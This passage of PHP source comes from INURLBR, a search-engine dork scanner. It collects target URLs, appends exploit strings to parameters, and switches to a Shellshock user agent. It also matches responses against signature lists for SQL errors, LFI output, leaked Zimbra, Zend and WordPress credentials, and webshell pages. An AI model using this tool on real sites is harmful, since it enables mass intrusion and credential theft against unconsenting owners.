  2188.         (not_isnull_empty($_SESSION['config']['exploit-all-id']) ? __configExploitsExec($_SESSION['config']['exploit-all-id'], $target_) : NULL);
  2189.         __plus();
  2190.  
  2191.         ($_SESSION['config']['robots'] ? __getValuesRobots($host) : NULL);
  2192.         __plus();
  2193.  
  2194.         (not_isnull_empty($_SESSION['config']['port-scan']) ? __portScan(array(0 => $target_, 1 => $_SESSION['config']['port-scan'])) : NULL);
  2195.         __plus();
  2196.  
  2197.         __timeSec('delay', "\n");
  2198.     }
  2199. }
  2200.  
  2201. ################################################################################
  2202. #PRINT MESSAGE AND OUT OF THE PROCESS###########################################
  2203. ################################################################################
  2204.  
  2205. function __getOut($msg) {
  2206.     __ircQuit($_SESSION['config']['irc']);
  2207.     print_r($msg);
  2208.     exit(1);
  2209. }
  2210.  
  2211. ################################################################################
  2212. #ERROR MAIN PROCESS RESPONSIBLE FOR ALL VALIDATION OF ENGINE####################
  2213. ################################################################################
  2214.  
  2215. function __process($resultadoURL) {
  2216.  
  2217.     __plus();
  2218.     $resultadoURL[0] = (is_array($resultadoURL) ? array_unique(array_filter($resultadoURL)) : $resultadoURL);
  2219.     $resultadoURL[0] = ($_SESSION['config']['unique'] ? __filterDomainUnique($resultadoURL[0]) : $resultadoURL[0]);
  2220.  
  2221.     $resultadoURL[0] = (not_isnull_empty($_SESSION['config']['ifurl']) ? __filterURLif($resultadoURL[0]) : $resultadoURL[0]);
  2222.     $_SESSION['config']['total_url'] = count($resultadoURL[0]);
  2223.  
  2224.     echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c12"]}[ TOTAL FOUND VALUES ]::{$_SESSION["c1"]} [ {$_SESSION['config']['total_url']} ]{$_SESSION["c0"]}\n";
  2225.     __debug(array('debug' => $resultadoURL[0], 'function' => '__process'), 3);
  2226.  
  2227.     if (count($resultadoURL[0]) > 0) {
  2228.  
  2229.         $_SESSION['config']['irc']['irc_connection'] = (not_isnull_empty($_SESSION['config']['irc']['conf']) ? __ircConect($_SESSION['config']['irc']) : NULL);
  2230.         $_SESSION['config']['irc']['my_fork'] = pcntl_fork();
  2231.  
  2232.         if ($_SESSION['config']['irc']['my_fork'] == 0) {
  2233.  
  2234.             (not_isnull_empty($_SESSION['config']['irc']['irc_connection']) ? __ircPong($_SESSION['config']['irc']) : NULL);
  2235.             exit(0);
  2236.         } else if ($_SESSION['config']['irc']['my_fork'] == -1) {
  2237.  
  2238.             __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}ERROR Fork failed{$_SESSION["c0"]}\n");
  2239.         }
  2240.  
  2241.         $_SESSION['config']['user-agent'] = ($_SESSION['config']['shellshock']) ? $_SESSION['config']['user_agent_xpl'] : $_SESSION['config']['user-agent'];
  2242.         foreach ($resultadoURL[0] as $url) {
  2243.  
  2244.             __plus();
  2245.             $url = urldecode(not_isnull_empty($_SESSION['config']['target']) ?
  2246.                             $_SESSION['config']['target'] . $url : $url);
  2247.  
  2248.             if (__validateURL($url) || not_isnull_empty($_SESSION['config']['abrir-arquivo'])) {
  2249.  
  2250.                 __processUrlExec(__filterURLTAG($url), $_SESSION["config"]["contUrl"] ++);
  2251.                 __plus();
  2252.             }
  2253.         }
  2254.     } else {
  2255.  
  2256.         print_r("{$_SESSION["c1"]}[ INFO ]{$_SESSION["c2"]} Not a satisfactory result was found!{$_SESSION["c0"]}\n");
  2257.     }
  2258. }
  2259.  
  2260. ################################################################################
  2261. #ERRORS STANDARDS OF SCRIPT VALIDATE WITH HTML RECEIVED#########################
  2262. ################################################################################
  2263.  
  2264. function __checkError($html_) {
  2265.  
  2266.  
  2267.     if (__validateOptions($_SESSION['config']['tipoerro'], '2')) {
  2268.  
  2269.         $validation['ERROR-CUSTOM'] = not_isnull_empty($_SESSION['config']['achar']) ? $_SESSION['config']['achar'] : NULL;
  2270.     }
  2271.  
  2272.     if (__validateOptions('1,3,4', $_SESSION['config']['tipoerro'])) {
  2273.  
  2274.         if (__validateOptions('3,4', $_SESSION['config']['tipoerro'])) {
  2275.  
  2276.             $validation['ERROR-CUSTOM'] = not_isnull_empty($_SESSION['config']['achar']) ? $_SESSION['config']['achar'] : NULL;
  2277.         }
  2278.  
  2279.         /* [*]SHELLSHOCK
  2280.          * (CVE-2014-6271, CVE-2014-6277,
  2281.          * CVE-2014-6278, CVE-2014-7169,
  2282.          * CVE-2014-7186, CVE-2014-7187)
  2283.          * is a vulnerability in GNU's bash shell that gives attackers access
  2284.          * to run remote commands on a vulnerable system. */
  2285.         $validation['SHELLSHOCK-01'] = '99887766555';
  2286.  
  2287.         /* [*]LOCAL FILE INCLUSION
  2288.          * Local File Inclusion (also known as LFI) is the process of including
  2289.          * files, that are already locally present on the server, through the
  2290.          * exploiting of vulnerable inclusion procedures implemented in the
  2291.          * application.
  2292.          * https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion */
  2293.         $validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
  2294.         $validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
  2295.         $validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
  2296.  
  2297.         /* [*]ZIMBRA MAIL
  2298.          * Zimbra 0day exploit / Privilegie escalation via LFI
  2299.          * This script exploits a Local File Inclusion in
  2300.          * /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
  2301.          * which allows us to see localconfig.xml
  2302.          * that contains LDAP root credentials wich allow us to make requests in
  2303.          * /service/admin/soap API with the stolen LDAP credentials to create user
  2304.          * with administration privlegies
  2305.          * and gain acces to the Administration Console.
  2306.          * https://www.exploit-db.com/exploits/30085/ */
  2307.         $validation['ZIMBRA-WEB-MAIL-01'] = 'zimbra_user';
  2308.         $validation['ZIMBRA-WEB-MAIL-02'] = 'zimbra_ldap_password';
  2309.         $validation['ZIMBRA-WEB-MAIL-03'] = 'ldap_replication_password';
  2310.         $validation['ZIMBRA-WEB-MAIL-04'] = 'ldap_root_password';
  2311.         $validation['ZIMBRA-WEB-MAIL-05'] = 'ldap_nginx_password';
  2312.         $validation['ZIMBRA-WEB-MAIL-06'] = 'mailboxd_keystore_password';
  2313.         $validation['ZIMBRA-WEB-MAIL-07'] = 'zimbra_mysql_password';
  2314.         $validation['ZIMBRA-WEB-MAIL-08'] = 'mysql_root_password';
  2315.         $validation['ZIMBRA-WEB-MAIL-10'] = 'mailboxd_truststore_password';
  2316.         $validation['ZIMBRA-WEB-MAIL-11'] = 'ldap_postfix_password';
  2317.         $validation['ZIMBRA-WEB-MAIL-12'] = 'ldap_amavis_password';
  2318.  
  2319.         /* [*]ZEND FRAMEWORK
  2320.          * Zend-Framework Full Info Disclosure
  2321.          * The username and password of the database may be obtained trough
  2322.          * the "application.ini" file
  2323.          * https://www.exploit-db.com/exploits/29921/ */
  2324.         $validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
  2325.         $validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
  2326.         $validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
  2327.         $validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
  2328.         $validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';
  2329.  
  2330.         /* [*]CMS WORDPRESS
  2331.          * As the name suggests, if the web application doesn’t check the file
  2332.          * name required by the user, any malicious user can exploit this
  2333.          * vulnerability to download sensitive files from the server.
  2334.          * Arbitrary File Download vulnerability file wp-config.php
  2335.          * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
  2336.          * http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure */
  2337.         $validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
  2338.         $validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
  2339.         $validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
  2340.         $validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
  2341.  
  2342.         /* [*]ERROR MARIADB
  2343.          * MariaDB is a drop-in replacement for MySQL.
  2344.          * MariaDB strives to be the logical choice for database professionals
  2345.          * looking for a robust, scalable, and reliable SQL server. To accomplish
  2346.          * this, the MariaDB Foundation work closely and cooperatively with the
  2347.          * larger community of users and developers in the true spirit of Free
  2348.          * and open source software, and release software in a manner that
  2349.          * balances predictability with reliability.
  2350.          * https://mariadb.org/en/about/ */
  2351.         $validation['MARIADB-01'] = 'MariaDB server version for the right syntax';
  2352.  
  2353.         /* [*]ERROR MYSQL
  2354.          * MySQL is a database management system (DBMS), which uses the SQL
  2355.          * (Structured Query Language, English Structured Query Language) as
  2356.          * interface. It is currently one of the most popular databases, with
  2357.          * more than 10 million installations worldwide
  2358.          * https://www.mysql.com/
  2359.          * http://php.net/manual/en/security.database.sql-injection.php
  2360.          */
  2361.         $validation['MYSQL-AND-MARIADB'] = 'You have an error in your SQL syntax;';
  2362.         $validation['MYSQL-03'] = 'Warning: mysql_';
  2363.         $validation['MYSQL-04'] = 'function.mysql';
  2364.         $validation['MYSQL-05'] = 'MySQL result index';
  2365.         $validation['MYSQL-07'] = 'MySQL Error';
  2366.         $validation['MYSQL-08'] = 'MySQL ODBC';
  2367.         $validation['MYSQL-09'] = 'MySQL Driver';
  2368.         $validation['MYSQL-10'] = 'mysqli.query';
  2369.         $validation['MYSQL-11'] = 'num_rows';
  2370.         $validation['MYSQL-12'] = 'mysql error:';
  2371.         $validation['MYSQL-13'] = 'supplied argument is not a valid MySQL result resource';
  2372.         $validation['MYSQL-14'] = 'on MySQL result index';
  2373.         $validation['MYSQL-15'] = 'Error Executing Database Query';
  2374.         $validation['MYSQL-01'] = 'mysql_';
  2375.  
  2376.         /* [*]ERROR MICROSOFT
  2377.          * MICROSOFT TECHNOLOGY
  2378.          * http://www.microsoft.com/pt-br/server-cloud/products/sql-server/
  2379.          * https://products.office.com/pt-br/access
  2380.          * https://www.owasp.org/index.php/Testing_for_SQL_Server */
  2381.         $validation['MICROSOFT-01'] = 'Microsoft JET Database';
  2382.         $validation['MICROSOFT-02'] = 'ADODB.Recordset';
  2383.         $validation['MICROSOFT-03'] = '500 - Internal server error';
  2384.         $validation['MICROSOFT-04'] = 'Microsoft OLE DB Provider';
  2385.         $validation['MICROSOFT-05'] = 'Unclosed quotes';
  2386.         $validation['MICROSOFT-06'] = 'ADODB.Command';
  2387.         $validation['MICROSOFT-07'] = 'ADODB.Field error';
  2388.         $validation['MICROSOFT-08'] = 'Microsoft VBScript';
  2389.         $validation['MICROSOFT-09'] = 'Microsoft OLE DB Provider for SQL Server';
  2390.         $validation['MICROSOFT-10'] = 'Unclosed quotation mark';
  2391.         $validation['MICROSOFT-11'] = 'Microsoft OLE DB Provider for Oracle';
  2392.         $validation['MICROSOFT-14'] = 'Active Server Pages error';
  2393.         $validation['MICROSOFT-15'] = 'OLE/DB provider returned message';
  2394.         $validation['MICROSOFT-16'] = 'OLE DB Provider for ODBC';
  2395.         $validation['MICROSOFT-17'] = "error '800a0d5d'";
  2396.         $validation['MICROSOFT-18'] = "error '800a000d'";
  2397.         $validation['MICROSOFT-19'] = 'Unclosed quotation mark after the character string';
  2398.         $validation['MICROSOFT-20'] = '[Microsoft][SQL Server Native Client 11.0][SQL Server]';
  2399.         $validation['MICROSOFT-21'] = 'Warning: odbc_';
  2400.  
  2401.         /* #[*]ERROR ORACLE
  2402.          * - DBMS currently marketed by Oracle, who was born in 1979 and was
  2403.          * the first relational BD sold worldwide;
  2404.          * - Latest version: Oracle Database 11G;
  2405.          * http://www.oracle.com/br/solutions/midsize/oracle-products/database/index.html
  2406.          * https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-fayo.pdf */
  2407.         $validation['ORACLE-01'] = 'ORA-00921: unexpected end of SQL command';
  2408.         $validation['ORACLE-02'] = 'ORA-01756';
  2409.         $validation['ORACLE-03'] = 'ORA-';
  2410.         $validation['ORACLE-04'] = 'Oracle ODBC';
  2411.         $validation['ORACLE-05'] = 'Oracle Error';
  2412.         $validation['ORACLE-06'] = 'Oracle Driver';
  2413.         $validation['ORACLE-07'] = 'Oracle DB2';
  2414.         $validation['ORACLE-08'] = 'error ORA-';
  2415.         $validation['ORACLE-09'] = 'SQL command not properly ended';
  2416.  
  2417.         /* #[*]ERROR DB2
  2418.          * DB2 is a database system Relational Manager (SGDBR) produced by IBM.
  2419.          * There are different versions of DB2 running from a simple PDA |
  2420.          * handheld, even in powerful mainframes and run on servers based on
  2421.          * Unix, Windows, or Linux.
  2422.          * http://www-01.ibm.com/software/br/db2/lowerdatabasecosts/
  2423.          * https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#DB2_Escaping */
  2424.         $validation['DB2-01'] = 'DB2 ODBC';
  2425.         $validation['DB2-02'] = 'DB2 error';
  2426.         $validation['DB2-03'] = 'DB2 Driver';
  2427.  
  2428.         /* #[*]ERROR ODBC
  2429.          * ODBC (acronym for Open Database Connectivity) is a standard for
  2430.          * access to managers of database systems (DBMS).
  2431.          * https://support.office.com/pt-br/article/Administrar-fontes-de-dados-ODBC-b19f856b-5b9b-48c9-8b93-07484bfab5a7
  2432.          * https://www.exploit-db.com/papers/12975/ */
  2433.         $validation['ODBC-01'] = 'ODBC SQL';
  2434.         $validation['ODBC-02'] = 'ODBC DB2';
  2435.         $validation['ODBC-03'] = 'ODBC Driver';
  2436.         $validation['ODBC-04'] = 'ODBC Error';
  2437.         $validation['ODBC-05'] = 'ODBC Microsoft Access';
  2438.         $validation['ODBC-06'] = 'ODBC Oracle';
  2439.         $validation['ODBC-07'] = 'ODBC Microsoft Access Driver';
  2440.  
  2441.         /* #[*]ERROR POSTGRESQL
  2442.          * PostgreSQL is an object-relational database management system
  2443.          * (ORDBMS), developed as an open source project.
  2444.          * http://www.postgresql.org.br/old/
  2445.          * https://www.owasp.org/index.php/OWASP_Backend_Security_Project_Testing_PostgreSQL */
  2446.         $validation['POSTGRESQL-01'] = 'Warning: pg_';
  2447.         $validation['POSTGRESQL-02'] = 'PostgreSql Error:';
  2448.         $validation['POSTGRESQL-03'] = 'function.pg';
  2449.         $validation['POSTGRESQL-04'] = 'Supplied argument is not a valid PostgreSQL result';
  2450.         $validation['POSTGRESQL-05'] = 'PostgreSQL query failed: ERROR: parser: parse error';
  2451.         $validation['POSTGRESQL-06'] = 'pg_';
  2452.  
  2453.         /* #[*]ERROR SYBASE
  2454.          * Sybase (NYSE: SY), an SAP company, is a software company that
  2455.          * produces services and products related to information management,
  2456.          * mobility, messaging, development tools, and data warehousing and
  2457.          * OLAP data.
  2458.          * https://www.owasp.org/index.php?search=SYBASE&title=Special%3ASearch&go=Go */
  2459.         $validation['SYBASE-01'] = 'Warning: sybase_';
  2460.         $validation['SYBASE-02'] = 'function.sybase';
  2461.         $validation['SYBASE-03'] = 'Sybase result index';
  2462.         $validation['SYBASE-04'] = 'Sybase Error:';
  2463.         $validation['SYBASE-05'] = 'Sybase: Server message:';
  2464.         $validation['SYBASE-06'] = 'sybase_';
  2465.         $validation['SYBASE-07'] = '[Sybase][ODBC Driver]:';
  2466.  
  2467.         /* #[*]ERROR JBOSSWEB
  2468.          * JBoss Web Server is an enterprise ready web server designed for
  2469.          * medium and large applications, based on Tomcat.
  2470.          * JBoss Web a component of the JBoss Application Server, there are
  2471.          * no more standalone version of JBoss Web you need the Application
  2472.          * Server to get the Servlet/JSP container.
  2473.          * http://jbossweb.jboss.org/
  2474.          * http://www.rapid7.com/db/search?utf8=%E2%9C%93&q=JBoss+&t=a */
  2475.         $validation['JBOSSWEB-01'] = 'java.sql.SQLSyntaxErrorException: ORA-';
  2476.         $validation['JBOSSWEB-02'] = 'org.springframework.jdbc.BadSqlGrammarException:';
  2477.         $validation['JBOSSWEB-03'] = 'javax.servlet.ServletException:';
  2478.         $validation['JBOSSWEB-04'] = 'java.lang.NullPointerException';
  2479.  
  2480.         /* #[*]ERROR JDBC
  2481.          * Java Database Connectivity or JDBC is a set of classes and
  2482.          * interfaces (API) written in Java that make sending SQL statements
  2483.          * for any relational database
  2484.          * http://www.oracle.com/technetwork/java/javase/jdbc/index.html
  2485.          * https://www.owasp.org/index.php/Preventing_SQL_Injection_in_Java */
  2486.         $validation['JDBC_CFM-01'] = 'Error Executing Database Query';
  2487.         $validation['JDBC_CFM-02'] = 'SQLServer JDBC Driver';
  2488.         $validation['JDBC_CFM-03'] = 'JDBC SQL';
  2489.         $validation['JDBC_CFM-04'] = 'JDBC Oracle';
  2490.         $validation['JDBC_CFM-05'] = 'JDBC MySQL';
  2491.         $validation['JDBC_CFM-06'] = 'JDBC error';
  2492.         $validation['JDBC_CFM-07'] = 'JDBC Driver';
  2493.  
  2494.         /* #[*]JAVA INFINITYDB
  2495.          * InfinityDB is an all-Java embedded database engine that is deployed
  2496.          * in handheld devices, on servers, on workstations, and in distributed
  2497.          * settings. */
  2498.         $validation['JAVA-INFINITYDB-01'] = 'java.io.IOException: InfinityDB';
  2499.  
  2500.         /* #[*]ERROR PHP
  2501.          * The PHP development team announces the immediate availability of
  2502.          * PHP 5.4.40. 14 security-related bugs were fixed in this release,
  2503.          * including CVE-2014-9709, CVE-2015-2301, CVE-2015-2783, CVE-2015-1352.
  2504.          * All PHP 5.4 users are encouraged to upgrade to this version.
  2505.          * http://php.net/ */
  2506.         $validation['ERRORPHP-01'] = 'Warning: include';
  2507.         $validation['ERRORPHP-02'] = 'Fatal error: include';
  2508.         $validation['ERRORPHP-03'] = 'Warning: require';
  2509.         $validation['ERRORPHP-04'] = 'Fatal error: require';
  2510.         $validation['ERRORPHP-05'] = 'ADODB_Exception';
  2511.         $validation['ERRORPHP-06'] = 'Warning: include(';
  2512.         $validation['ERRORPHP-07'] = 'Warning: require_once(';
  2513.         $validation['ERRORPHP-08'] = 'function.include';
  2514.         $validation['ERRORPHP-09'] = 'Disallowed Parent Path';
  2515.         $validation['ERRORPHP-10'] = 'function.require';
  2516.         $validation['ERRORPHP-11'] = 'Warning: main(';
  2517.         $validation['ERRORPHP-12'] = 'Warning: session_start()';
  2518.         $validation['ERRORPHP-13'] = 'Warning: getimagesize()';
  2519.         $validation['ERRORPHP-16'] = 'Warning: array_merge()';
  2520.         $validation['ERRORPHP-17'] = 'Warning: preg_match()';
  2521.         $validation['ERRORPHP-18'] = 'GetArray()';
  2522.         $validation['ERRORPHP-19'] = 'FetchRow()';
  2523.         $validation['ERRORPHP-20'] = 'Warning: preg_';
  2524.         $validation['ERRORPHP-21'] = 'Warning: ociexecute()';
  2525.         $validation['ERRORPHP-22'] = 'Warning: ocifetchstatement()';
  2526.         $validation['ERRORPHP-23'] = 'PHP Warning:';
  2527.  
  2528.         /* #[*]ERROR ASP
  2529.          * The ASP (Active Server Pages), also known as Classic ASP today, is a
  2530.          * framework of basic libraries (and not a language) for processing of
  2531.          * scripting languages on the server side to generate dynamic content on
  2532.          * the Web
  2533.          * http://www.asp.net/ */
  2534.         $validation['ERRORASP-01'] = 'Version Information: Microsoft .NET Framework';
  2535.         $validation['ERRORASP-04'] = 'ASP.NET is configured to show verbose error messages';
  2536.         $validation['ERRORASP-05'] = 'BOF or EOF';
  2537.         $validation['ERRORASP-06'] = 'Unclosed quotation mark';
  2538.         $validation['ERRORASP-06'] = 'Error converting data type varchar to numeric';
  2539.  
  2540.         /* #[*]ERROR LUA
  2541.          * Lua is a scripting language imperative, procedural, small, reflective
  2542.          * and light, designed to expand applications in general, to be an
  2543.          * extensible language (which connects parts of a program made in more
  2544.          * than one language)
  2545.          * http://www.lua.org/ */
  2546.         $validation['ERRORLUA-01'] = 'LuaPlayer ERROR:';
  2547.         $validation['ERRORLUA-02'] = 'CGILua message';
  2548.         $validation['ERRORLUA-03'] = 'Lua error';
  2549.  
  2550.         #[*]ERROR INDEFINIDOS
  2551.        $validation['INDEFINITE-01'] = 'Incorrect syntax near';
  2552.         $validation['INDEFINITE-02'] = 'Fatal error';
  2553.         $validation['INDEFINITE-04'] = 'Invalid Querystring';
  2554.         $validation['INDEFINITE-05'] = 'Input string was not in a correct format';
  2555.         $validation['INDEFINITE-06'] = 'An illegal character has been found in the statement';
  2556.  
  2557.         #[*]SHELL SCRIPT backdoored.
  2558.        $validation['SHELL-01'] = 'c99shell</title>';
  2559.         $validation['SHELL-02'] = 'C99Shell v';
  2560.         $validation['SHELL-03'] = '<form method="POST" action="cfexec.cfm">';
  2561.         $validation['SHELL-05'] = '<input type=text name=".CMD" size=45 value=';
  2562.         $validation['SHELL-05'] = '<title>awen asp.net webshell</title>';
  2563.         $validation['SHELL-06'] = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>";
  2564.         $validation['SHELL-07'] = 'JSP Backdoor Reverse Shell';
  2565.         $validation['SHELL-08'] = 'Simple CGI backdoor by DK';
  2566.         $validation['SHELL-09'] = 'execute command: <input type="text" name="c">';
  2567.         $validation['SHELL-10'] = 'Execute Shell Command';
  2568.         $validation['SHELL-11'] = 'r57shell</title>';
  2569.         $validation['SHELL-12'] = '<title>r57Shell';
  2570.         $validation['SHELL-13'] = 'heroes1412';
  2571.         $validation['SHELL-14'] = 'MyShell';
  2572.         $validation['SHELL-15'] = 'PHP Shell';
  2573.         $validation['SHELL-16'] = 'PHPShell';
  2574.         $validation['SHELL-17'] = 'REMVIEW TOOLS';
  2575.         $validation['SHELL-18'] = '<title>iTSecTeam</title>';
  2576.         $validation['SHELL-19'] = 'JSP Backdoor Reverse Shell';
  2577.         $validation['SHELL-20'] = '<title>*  ernealizm  * </title>';
  2578.         $validation['SHELL-21'] = '<title>JSP Shell</title>';
  2579.         $validation['SHELL-22'] = '<title>KNULL Shell</title>';
  2580.         $validation['SHELL-23'] = '<title>.+- WSO.+</title>';
  2581.         $validation['SHELL-24'] = '<title>SST Sheller !</title>';
  2582.         $validation['SHELL-25'] = '<title>SyRiAn Sh3ll';
  2583.         $validation['SHELL-26'] = '<title>Mini Php Shell';
  2584.         $validation['SHELL-27'] = '<title>ASPX Shell</title>';
  2585.         $validation['SHELL-28'] = '<title>ZoRBaCK Connect</title>';
  2586.         $validation['SHELL-29'] = '<title>.+Ani-Shell.+</title>';
  2587.         $validation['SHELL-30'] = '<title>Stored Procedure Execute</title>';
  2588.         $validation['SHELL-31'] = '<title>:: www.h4ckcity.org :: Coded By 2MzRp & LocalMan ::</title>';
  2589.         $validation['SHELL-32'] = '<title>PhpShell 2.0</title>';
  2590.         $validation['SHELL-33'] = '<title>.+NTDaddy.+</title>';
  2591.         $validation['SHELL-34'] = '<title>PHP-Terminal';
  2592.  
  2593.         $_SESSION['config']['cms-check-resultado'] = (!is_null($_SESSION['config']['cms-check'])) ? __SimpleCheckCMS($html_) : NULL;
  2594.     }
  2595.  
  2596.     if (!is_null($_SESSION['config']['regexp'])) {
  2597.  
  2598.         preg_match_all("#\b{$_SESSION['config']['regexp']}#i", $html_, $match);
  2599.         __plus();
  2600.         return (isset($match[0][0]) && !empty($match[0][0]) ? " regular expression->{$_SESSION['config']['regexp']} - " . $match[0][0] . " FOUD! " : NULL);
  2601.     } else {
  2602.  
  2603.         foreach ($validation as $campo => $valor) {
  2604.  
  2605.             __plus();
  2606.             if (__validateBD($html_, $validation[$campo], $campo)) {
  2607.  
  2608.                 __plus();
  2609.                 return(" {$campo}  -  VALUE: {$validation[$campo]}");
  2610.             }
  2611.         }
  2612.     }
  2613. }
  2614.  
  2615. ################################################################################
  2616. #CHECK ERROR 2 HTML INSIDE######################################################
  2617. ################################################################################
  2618.  
  2619. function __validateBD($html_, $verificar, $bd) {
  2620.  
  2621.     return (strstr($html_, $verificar)) ? $bd : NULL;
  2622. }
  2623.  
  2624. ################################################################################
  2625. #FORMAT URL#####################################################################
  2626. ################################################################################
  2627.  
  2628. function __mountURLExploit($_url) {
  2629.  
  2630.     $_url = explode("=", trim(urldecode($_url)));
  2631.     $get = max(array_keys($_url));
  2632.     $get_ = $_url[$get];
  2633.     return implode("=", str_replace($get_, $get_ . ((!is_null($_SESSION['config']['exploit-get'])) ? $_SESSION['config']['exploit-get'] : NULL), $_url));
  2634. }
  2635.  
  2636. ################################################################################
  2637. #FILTER HTML URLs ALL THE RETURN OF seekers#####################################
  2638. ################################################################################
  2639.  
  2640. function __filterURL($html, $op = NULL) {
  2641.  
  2642.     $reg = !strstr($op, 'GOOGLE') ? "#\b(href=\"|src=\"|value=\")(.*?)(\")#si" :
  2643.             "#\b(href=\"|src=\"|value=\"http[s]?://|href=\"|src=\"|value=\"ftp[s]?://){1,}?([-a-zA-Z0-9\.]+)([-a-zA-Z0-9\.]){1,}([-a-zA-Z0-9_\.\#\@\:%_/\?\=\~\-\//\!\'\(\)\s\^\:blank:\:punct:\:xdigit:\:space:\$]+)#si";
  2644.     $html = str_replace('href="/url?q=', 'href="', $html);
  2645.  
  2646.     if (strstr($html, '.google.com/sorry/IndexRedirect?continue=https://www.google.com.') && $_SESSION['config']['persist'] <= $_SESSION["config"]['google_attempt'][1]) {
  2647.  
  2648.         print_r("{$_SESSION["c1"]}[ INFO ][ ERROR ]{$_SESSION["c2"]} GOOGLE LOCKED!{$_SESSION["c0"]}\n");
  2649.         $randHost = __dominioGoogleRandom();
  2650.         $_SESSION["config"]['google_attempt'][1] ++;
  2651.         __pageEngine($_SESSION["config"]["conf_array_tmp"], "GOOGLE - {$randHost}", "https://{$randHost}/search?q=[DORK]&num=1500&btnG=Search&pws=1", $_SESSION["config"]["dork_tmp"], NULL, 0, 0, 1);
  2652.     } else {
  2653.         $_SESSION["config"]["google_attempt"][1] = 0;
  2654.         preg_match_all($reg, $html, $html);
  2655.         return (array_filter(array_unique($html[0])));
  2656.     }
  2657. }
  2658.  
  2659. ################################################################################
  2660. #FILTER HTML URLs ALL THE RETURN OF GOOGLE API##################################
  2661. ################################################################################
  2662.  
  2663. function __filterURLJson($html) {
  2664.  
  2665.     $html = json_decode($html, true);
  2666.     $allresponseresults = $html['responseData']['results'];
  2667.     foreach ($allresponseresults as $value) {
  2668.         $tmp[] = $value['url'];
  2669.     }
  2670.     return (array_filter(array_unique($tmp)));
  2671. }
  2672.  
  2673. ################################################################################
  2674. #Filtering the repeated emails #################################################
  2675. ################################################################################
  2676.  
  2677. function __filterEmailsRepeated() {
  2678.  
  2679.     echo "\n\n{$_SESSION["c1"]}|[ INFO ][ Filtering the repeated emails  the file {$_SESSION['config']['arquivo_output']} ]{$_SESSION["c0"]}\n";
  2680.     $array = __openFile($_SESSION['config']['out_put_paste'] . $_SESSION['config']['arquivo_output'], 1);
  2681.     if (is_array($array)) {
  2682.  
  2683.         unlink($_SESSION['config']['out_put_paste'] . $_SESSION['config']['arquivo_output']);
  2684.         unset($_SESSION['config']['resultado_valores']);
  2685.         foreach ($array as $value) {
  2686.  
  2687.             __saveValue($_SESSION['config']['out_put_paste'] . $_SESSION['config']['arquivo_output'], $value, 2) . __plus();
  2688.             $_SESSION['config']['resultado_valores'] .= "{$value}\n";
  2689.         }
  2690.     } else {
  2691.  
  2692.         echo "\n\n{$_SESSION["c1"]}|[ ERROR ][ ERROR EMAILS FILTERING ]{$_SESSION["c0"]}\n";
  2693.     }
  2694. }
  2695.  
  2696. ################################################################################
  2697. #COUNTING PROCESS END URLS / vuln AND SHOWING THE URLS / vuln###################
  2698. ################################################################################
  2699.  
  2700. function __exitProcess() {
  2701.  
  2702.     $file = !is_null($_SESSION['config']['arquivo_output']) ? $_SESSION['config']['arquivo_output'] : NULL;
  2703.     $file_all = !is_null($_SESSION['config']['arquivo_output_all']) ? $_SESSION['config']['arquivo_output_all'] : NULL;
  2704.     (($_SESSION['config']['extrai-email']) ? __filterEmailsRepeated() : NULL);
  2705.     $cont = count(explode("\n", $_SESSION['config']['resultado_valores'])) - 1;
  2706.     echo "\n\n{$_SESSION["c1"]}[ INFO ] [ Shutting down ]{$_SESSION["c0"]}";
  2707.     echo "\n{$_SESSION["c1"]}[ INFO ] [ End of process INURLBR at [" . date("d-m-Y H:i:s") . "]{$_SESSION["c0"]}";
  2708.     echo "\n{$_SESSION["c1"]}[ INFO ] {$_SESSION["c0"]}{$_SESSION["c16"]}[ TOTAL FILTERED VALUES ]::{$_SESSION["c1"]} [ {$cont} ]{$_SESSION["c0"]}";
  2709.     echo!is_null($file) ? "\n{$_SESSION["c1"]}[ INFO ] {$_SESSION["c16"]}[ OUTPUT FILE ]::{$_SESSION["c1"]} [ " . getcwd() . "/{$_SESSION['config']['out_put_paste']}{$file}  ]{$_SESSION["c0"]}" : NULL;
  2710.     echo!is_null($file_all) ? "\n{$_SESSION["c1"]}[ INFO ] {$_SESSION["c16"]}[ OUTPUT FILE ALL ]::{$_SESSION["c1"]} [ " . getcwd() . "/{$_SESSION['config']['out_put_paste']}{$file_all}  ]{$_SESSION["c0"]}" : NULL;
  2711.     echo "\n{$_SESSION["c1"]}|_________________________________________________________________________________________{$_SESSION["c0"]}\n";
  2712.  
  2713.     print_r(!$_SESSION['config']['extrai-email'] ? $_SESSION['config']['resultado_valores'] : NULL);
  2714.  
  2715.     echo "\n{$_SESSION["c1"]}\_________________________________________________________________________________________/{$_SESSION["c0"]}\n";
  2716.     __getOut("\n");
  2717. }
  2718.  
  2719. ################################################################################
  2720. #CASE URLS FILTER AND VALIDATING URL VALID######################################
  2721. ################################################################################
  2722.  
  2723. function __subProcess($resultado = NULL) {
  2724.  
  2725.     $resultado_ = is_array($resultado) ? array_unique(array_filter($resultado)) : $resultado;
  2726.     if (isset($resultado_)) {
  2727.  
  2728.         foreach ($resultado_ as $result) {
  2729.  
  2730.             $result = __filterURLTAG($result);
  2731.             $result_ = __validateURL($result) ? $result : NULL;
